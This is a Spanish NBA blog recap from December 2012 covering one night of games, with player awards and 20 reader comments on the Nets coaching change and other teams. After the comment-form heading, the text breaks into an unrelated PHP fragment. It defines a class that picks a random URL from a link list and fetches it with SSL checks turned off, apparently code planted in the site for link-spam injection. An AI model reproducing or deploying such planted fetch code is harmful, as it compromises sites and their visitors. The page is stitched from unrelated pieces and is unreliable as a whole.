Crónica: ¡JR SMITH!

27 de December de 2012 por Simon

Jornada de miércoles que, como siempre, y a pesar de ser navidad, viene cargada de partidos. Entre lo más destacado está la suspensión del partido entre Chicago e Indiana por las importantes tormentas y nevadas que están sufriendo en la zona de Indiana, el buzzer beater de Jr Smith, Bryant se volvió a ir a 40 puntos en la derrota de su equipo, el partidazo de Robin López, que al final va a terminar siendo el hermano bueno como siga así, y lo imparables que se muestran Harden y sus Rockets con la quinta victoria al hilo.

Los Angeles Lakers vieron cortada su racha de 5 victorias en el Pepsi Center. En un partido jugado a muchos puntos y sin preocuparse por la defensa, los Nuggets se vieron mucho más cómodos y frescos para mantener ese gran ritmo de juego que exige este estilo. Howard fue expulsado en el tercer cuarto tras una fea, feísima, falta a “The Manimal”. Denver tuvo desde mitad del tercer cuarto el partido bastante encarrilado. La clave de la victoria de los Nuggets estuvo en su gran acierto desde la línea de 3, algo a lo que no están acostumbrados, más del 50% en triples del equipo y seis triples en 7 intentos de Corey Brewer que fue un martillo que golpeó a los Lakers una y otra vez para acabar con 27 puntos. Kobe se fue por encima de 40 con 24 tiros y más del 50% de acierto. Buen partido de Gasol y Nash que no fue suficiente para competir con los Nuggets, que son el mejor equipo de la liga en su cancha en estos momentos. (114-126).

Tras la derrota en el Staples el día de Navidad, los Knicks visitaban a Phoenix Suns. Mike Woodson dio descanso a sus dos mejores jugadores en lo que va de temporada, Carmelo Anthony y Raymond Felton. Chandler comenzó el partido queriendo resarcirse de su mala noche anterior consiguiendo 8 puntos en el primer cuarto, mientras Dudley nos anunciaba que ayer veía el aro como una piscina anotando 13 puntos en este cuarto. En el segundo cuarto el partido parecía que iba a romperse a favor de New York pero Dudley y Gortat volvieron a meter a Phoenix en la disputa del partido en el tercer acto, así se entro con el marcador igualado al cuarto cuarto. Y ahí apareció JR Smith, con dos canastas imposibles en los últimos 15 segundos, consiguió igualar con la primera y ganar el partido con la segunda. Increíble como New York ha conseguido centrar y sumar para la causa a este chico que era más conocido por sus problemas fuera de la cancha que dentro. JR terminó con 27 puntos y Dudley sumó 36 puntos que finalmente fueron inútiles. (99-97).

Houston alargó a 5 su racha de victorias consecutivas, que le colocan sextos del Oeste, ante Minnesota Timberwolves. El partido fue muy igualado en casi todo momento, pero con un acierto global bastante bajo por parte de ambos equipos. Harden hizo en los minutos finales la fiesta y acabó solventando el partido a favor de sus Rockets, a pesar del mal partido de Jeremy Lin. Asik cumplió con el rebote y fue efectivo en sus pocos tiros. Por parte de Minnesota, los mejores fueron Shved y Barea, Rubio continúa sin encontrar el ritmo de juego y Love ¡Ay Love! No sé si es por su lesión o por su excesiva frustración con la franquicia tras el cruce de declaraciones pero no creo que actualmente esté cerca de ser un jugador franquicia para un equipo que quiera aspirar a algo más que Play Off. (87-84).

Memphis perdió en casa ante Philadelphia y continúa perdiendo posiciones respecto a los dos líderes de la conferencia. Memphis tan solo ha ganado la mitad de sus últimos 10 partidos disputados. Philadelphia jugó un gran partido en equipo. Jrue Holiday y Evan Turner se dedicaron a repartir juego entre sus compañeros, y fueron Wright y Hawes los que se pusieron el traje de ejecutores para terminar llevándose el partido. En Memphis Randolph y Gasol estuvieron a buen nivel pero demasiado solos. Con esta victoria Philadelphia rompe una serie de 5 partidos seguidos perdidos fuera de su casa. Ahora mismo tienen el noveno puesto de la conferencia y mirando los equipos que hay por encima de ellos, si Bynum no vuelve pronto lo van a tener complicado para entrar en Play Off. (99-89).

Milwaukee sigue con su buen momento a costa de unos Nets que cada vez van más a la deriva. Williams se perdió el partido de anoche, pero el papel de su equipo fue más o menos igual que cuando él está. Un JoJo desacertadísimo y desubicado, Brook López se dedica a estar correcto y nada más, el banquillo aporta poco a excepción de un Blatche que pide más minutos y Wallace es el único que está cumpliendo pero no es suficiente para que este equipo recupere el ritmo que tenía al inicio de temporada. Por parte de Milwaukee, Jennings y Ellis se complementaron a la perfección. Larry Sanders sumó un nuevo doble-doble y desde el banquillo aportaron mucho Ilyasova y Dunleavy. (93-108).

En el resto de partidos de la jornada, Golden State sumó una importantísima victoria en Utah para sus aspiraciones por dos motivos, Utah podría ser un rival directo y el EnergySolutions Arena es una cancha donde la mayoría de sus rivales por los Play Off caerán. Curry continúa su gran momento con 23 puntos 8 rebotes y 7 asistencias. (94-83). El campeón Miami Heat endosó a Charlotte su decimosexta derrota consecutiva. Lebron y Wade se combinaron para 56 puntos, 21 rebotes y 13 asistencias. (105-92). San Antonio ganó con mucha suficiencia a Toronto con minutos para todos sus jugadores y 5 de ellos en dobles figuras. Calderón volvió a superar las 10 asistencias como titular. (80-100).

Atlanta necesitó de dos prorrogas para superar a unos Pistons que tuvieron anoche una grandísima actuación de su banquillo con hasta 4 jugadores en dobles figuras de anotación. Dentro de la gran aportación del banquillo, se destacó especialmente Will Bynum con 31 puntos. Los mismos que consiguió Josh Smith, pero este para llevar a su equipo a la victoria. (119-126). Orlando cayó ante New Orleans Hornets gracias al partidazo de Robin López y Vásquez. Quién ha visto y quién ve a Robin López, aquel al que ni siquiera Nash consiguió sacarle partido lo está consiguiendo Vásquez, de expediente X. (97-94). Cleveland venció en Washington en el duelo de colistas del Este. (87-84). Portland se cuela en Play Off tras vencer a Sacramento con facilidad. (91-109).

PREMIOS

MVP: Inmensos el sempiterno LeBron (27-12-8) y Josh Smith (31-10-6) que este año ya debería encontrar excusas para que no aparezca en el all-star. Sin embargo, nos parece más impresionante la actuación de JR Smith saliendo desde el banco y esas últimas acciones para ganar a los Suns. 27 puntos, 6 rebotes, 5 asistencias, 5 robos y un tapón. Otros nombres a tener en cuenta hoy han sido Harden y Robin López.

Rookie: Muy pocas veces falla en esta categoría Damian Lillard, rozando el triple doble 17-8-11, más una asistencia y un robo. Logró llegar a su equipo a la victoria a diferencia del otro en discordia, Andre Drummond, en mejor estado de forma que su compañero Monroe.

Sorpresa: Un escándalo de partido de Robin Lopez, aunque este año es menos sorpresa pues está jugando bien. Nos quedamos con la actuación de Corey Brewer, increíble desde la larga distancia, para ajusticiar a los Lakers.

Decepción: Varios nombres para la lista de la vergüenza. Howard ya escuchó abucheos en la victoria ante New York, qué no debería haber escuchado anoche. Love, JoJo… desconocidos (aunque el último demasiado habitual en esta categoría últimamente)

Esfuerzo en vano: Tiene pinta que este año se lo puede llevar él. Kobe fue el mejor nuevamente, con 40 puntazos, 4 rebotes y 6 asistencias para nada. Impresionantes también Kemba Walker, Nelson, Dudley…

TOP-10

Comenta

20 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    A ver Nets entrarán en PO -no se justifica que sufran por estar en ellos- por los jugadores que tienen pero es cierto que con Avery al mando están muy encorsetados,poco momento para la fantasía y mucho para el trabajo de pico y pala,y eso se nota en el termómetro del equipo que es Deron Williams,el cual es cierto que juega con cierta merma física pero en un sistema más libre brillaría más de lo que hace a día de hoy.Para decirlo simple y llanamente,aburren y eso en un equipo que ha nacido bajo la sombra de los Knicks,con el buen momento de los vecinos,es de difícil digestión.

    Y sobre mi admirado Kevin Love,no sé qué le pasa,pero el bajón que ha sufrido es de los gordos.Los porcentajes lo explican todo,35% en TC (45),22% en triples(37) y 69% en libres(82).En paréntesis sus porcentajes de la temporada pasada.Si eso no es involución…¿Motivos?

      Citar

  2. Denise dice:
    #2

    Ruxixón: A ver Nets entrarán en PO -no se justifica que sufran por estar en ellos- por los jugadores que tienen pero es cierto que con Avery al mando están muy encorsetados,poco momento para la fantasía y mucho para el trabajo de pico y pala,y eso se nota en el termómetro del equipo que es Deron Williams,el cual es cierto que juega con cierta merma física pero en un sistema más libre brillaría más de lo que hace a día de hoy.Para decirlo simple y llanamente,aburren y eso en un equipo que ha nacido bajo la sombra de los Knicks,con el buen momento de los vecinos,es de difícil P>

    Yo no le pegaría palos a mr. Bonobus.

    La temporada de Nets está siendo buena, por encima de mis expectativas. A la plantilla que tienen no se les puede exigir el anillo, el problema es que el dueño ruso se ha gastado tanto y ha sobrepagado tanto a los jugadores que parece como si no llegar a la final de conferencia es un fracaso.
    Pero si miras la plantilla jugador por jugador y sin tener en cuenta el dinero gastado, ves que Deron está en una de sus peores temporadas; que Joe Johnson no es ni la mitad de buen jugador de lo que dice su contrato, y que a Humphries se le ha olvidado jugar al baloncesto.

      Citar

  3. Maicas dice:
    #3

    Partido tras partido de los Nuggets veo como destacais jugadores pero poco se nombra a Kenneth Faried, para mi humilde opinion la clave de este equipo. En canal+ pasa exactamente lo mismo.
    ¿Puede ser que lo vea mejor de lo que en realidad es? Mirando sus partidos me da buenisimas sensaciones y luego ves sus numeros y promedia doble doble.

      Citar

  4. Pikerton64 dice:
    #4

    Que malo es Houston. ¿Cómo puede ese equipo sin jugadores ganar? Solo tienen a Harden bueno. Ayer Lin hizo un partido horrendo, debería estar entre los peores de su carrera, Asik es el típico blanco alto empanado. Y de los demás solo Parsons y Delfino me parecen buenos, pero hombre…
    Por parte de los Wolves, Barea y Shved on fire. Love falló sus últimos 7 tiros. Pek se llevó un golpe y jugó tocado. Y Cunnigham es dios. Ganamos de 14, hacen un 7-0 de parcial y sin tiempo muerto. Se nos ponen a 2, TM. El último ataque y el anterior un despropósito. Me desquició fenómeno la estúpida actitud de Ricky de buscar en cada acción el teatro. Vaya, parecía un futbolista.
    Lo que no puede ser es ir ganando de 10 contra Kniks y Rockets y perder. Contra Kniks vale, porque son hype y tal. ¿Pero Houston? Perder contra ellos es como perder contra Charlotte (que perdimos porque jugaron genial) o contra Washington. Me molesta empezar bien la temporada, tener un equipo genial y perder después de ir ganando de 15 y contra equipos mediocres.

      Citar

  5. Ruxixón dice:
    #5

    Han despedido a Avery Johnson en los Nets,antes hablamos de él…en fin,veremos si se quedan con el interino o van a por un entrenador top.

      Citar

  6. nba dice:
    #6

    Suena Mike Brown o McMillan …, ahora en serio que poca paciencia tienen algunos con un proyecto todavia sin ensamblar

      Citar

  7. txusma dice:
    #7

    Maicas:
    Partido tras partido de los Nuggets veo como destacais jugadores pero poco se nombra a Kenneth Faried, para mi humilde opinion la clave de este equipo. En canal+ pasa exactamente lo mismo.
    ¿Puede ser que lo vea mejor de lo que en realidad es? Mirando sus partidos me da buenisimas sensaciones y luego ves sus numeros y promedia doble doble.

    Ya comenté que tiene un problema grave en cuanto a defensa individual se refiere pero hay q reconocerle que le echa lo que hay q echar y con ese esfuerzo suple muchas de sus carencias.

      Citar

  8. Viva_Dirk dice:
    #8

    Maicas:

    Partido tras partido de los Nuggets veo como destacais jugadores pero poco se nombra a Kenneth Faried, para mi humilde opinion la clave de este equipo. En canal+ pasa exactamente lo mismo.
    ¿Puede ser que lo vea mejor de lo que en realidad es? Mirando sus partidos me da buenisimas sensaciones y luego ves sus numeros y promedia doble doble.

    Es un gran jugador de transición y ataques rápidos, seguramente uno de los ala-pivots mas veloces de la liga, unido a que es un reboteador brutal eso le da muchos puntos fáciles con altos porcentajes. En estático busca mucho el pick&roll o espera en la linea de fondo, todo a través del físico. Eso si, realmente es un mal pasador, muy malo.

    Yo no le veo tan mal defensor como dice Txus, tiene buenas manos y se desplaza bien. Tácticamente si es peor y se precipita demasiadas veces. Pero eso lo arregla el tiempo.

      Citar

  9. Viva_Dirk dice:
    #9

    Mas cosas.

    – Me parece fenomenal el despido de Avery Johnson, es un paquete. Desde luego McMillan no va a hacer maravillas con ese equipo, de lo disponible me gusta Cheeks, doy por imposible a Sloan que si podria hacer un equipazo con lo que hay.

    – Los Lakers han mejorado bastante con la vuelta de Nash. Ayer perdieron con unos Nuggets que lo metieron todo y con Dwight expulsado. Van a ganar muchos partidos en el último cuarto si la defensa no dice lo contrario. Me sigue sin gustar nada que no juegue Jamison que es un perfil ideal para el juego que hacemos.

      Citar

  10. Esteban dice:
    #10

    creo que en mi moch puse a every como entrenador del año, jeje arranco bien pero vaya que la ha cagado,

    creo una buena defensiva, pero la falta de fluidez ofensiva ya era alarmante con semejantes mimbres

      Citar

  11. MagicJohnson32 dice:
    #11

    Viva_Dirk:
    Mas cosas.

    – Me parece fenomenal el despido de Avery Johnson, es un paquete. Desde luego McMillan no va a hacer maravillas con ese equipo, de lo disponible me gusta Cheeks, doy por imposible a Sloan que si podria hacer un equipazo con lo que hay.

    – Los Lakers han mejorado bastante con la vuelta de Nash. Ayer perdieron con unos Nuggets que lo metieron todo y con Dwight expulsado. Van a ganar muchos partidos en el último cuarto si la defensa no dice lo contrario. Me sigue sin gustar nada que no juegue Jamison que es un perfil ideal para el juego que hacemos.

    Correcto, de acuerdo con ambos comentarios. El despido de Avery debió haber ocurrido hace tiempo. Es muy malo. Ya fue un error darle una plantilla joven y prometedora en su momento, y lo de este año, con presión por obtener resultados, estaba cantado.

      Citar

  12. Sempren dice:
    #12

    Viva_Dirk: Es un gran jugador de transición y ataques rápidos, seguramente uno de los ala-pivots mas veloces de la liga, unido a que es un reboteador brutal eso le da muchos puntos fáciles con altos porcentajes. En estático busca mucho el pick&roll o espera en la linea de fondo, todo a través del físico. Eso si, realmente es un mal pasador, muy malo.

    Yo no le veo tan mal defensor como dice Txus, tiene buenas manos y se desplaza bien. Tácticamente si es peor y se precipita demasiadas veces. Pero eso lo arregla el tiempo.

    No debemos olvidar que es un Sophomore, que además el año pasado tardó mucho en entrar en las rotaciones.

    Sobre lo que dice Maicas, en general de los Nuggets no se habla mucho. En parte es porque siempre están en PO, pero nunca llegan más allá; en parte porque ya no tienen ningún jugador que atraiga atenciones.
    Pero ojo, porque a la estadística que comenta Simon (los mejores locales de la liga) se le suma que, al menos hasta la semana pasada, eran el equipo que más había jugado de visitante, lo que explicaba en parte su registro discreto.
    Tampoco creo que este vaya a ser su año, ni les veo mejor que a Grizzlies, por ejemplo, pero darán muchos quebraderos de cabeza, seguro.

      Citar

  13. MagicJohnson32 dice:
    #13

    Que alguien me ayude: ¿cuántos pasos da Curry en la elegida como cuarta mejor jugada del día? ¿Son 4 o 5? Juassss…

      Citar

  14. suffer dice:
    #14

    Si vieras bien 3…(como le gusta a la gente hablar por hablar) muy bien los warriors y bien curry en el 1 cuarto.

    ahora termine de ver el dallas vs thunder… que mal mayo… tenia para empatar al final con 3 tiros libres y solo achunta a uno puff

      Citar

  15. Denise dice:
    #15

    Para mi inmerecido lo de Avery Johnson, que estan a 3 victorias del 3º puesto y tampoco es que tengan una plantilla Top…
    Por esta regla de 3, Boston, Philadelphia, Denver, Minnessota, Utah o Dallas tambien deberian de haber fulminado a sus coachs.

      Citar

  16. simon dice:
    #16

    sobre los Nuggets: creo que están bastante bien para el calendario que han tenido ahora tienen creo que son 15 o 17 partidos de los proximos 20 en su casa… y ahi deben de escalar posiciones y ponerse por delante de los Warriors, incluso peleando con los Grizzlies, aunque sin llegar a superarlos. Por el registro que llevan parece que van peor de lo que van pero para mi, viendo el calendario están “bien” aunque podrían estar un poquito mejor. Además poco a poco parecen mas conjuntados los jugadores aunque les sigue faltando un cuatro, no se por qué no está jugando Anthony Randolph, podría aportar cositas, además solo tiene 23 años. Y Faried podría salir desde el banco y revolucionar aun mas a Denver desde ahí.

      Citar

  17. simon dice:
    #17

    Denise:
    Para mi inmerecido lo de Avery Johnson, que estan a 3 victorias del 3º puesto y tampoco es que tengan una plantilla Top…
    Por esta regla de 3, Boston, Philadelphia, Denver, Minnessota, Utah o Dallas tambien deberian de haber fulminado a sus coachs.

    Hombre Denise es que con esta eran 3 las temporadas que llevaba naufragando Avery Johnson, Vale que no tenia buenas plantillas pero los resultados cosechados eran aun peores que el nivel que se les presuponia a los Nets cada año mirando sus jugadores.

      Citar

  18. MagicJohnson32 dice:
    #18

    suffer:
    Si vieras bien 3…(como le gusta a la gente hablar por hablar)

    Ah, solo 3, entonces no pasa nada xD

      Citar

  19. txusma dice:
    #19

    MagicJohnson32: Ah, solo 3, entonces no pasa nada xD

    Ahora nos ponemos puristas? :XD

      Citar

  20. Denise dice:
    #20

    Da 4 pasos claramente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>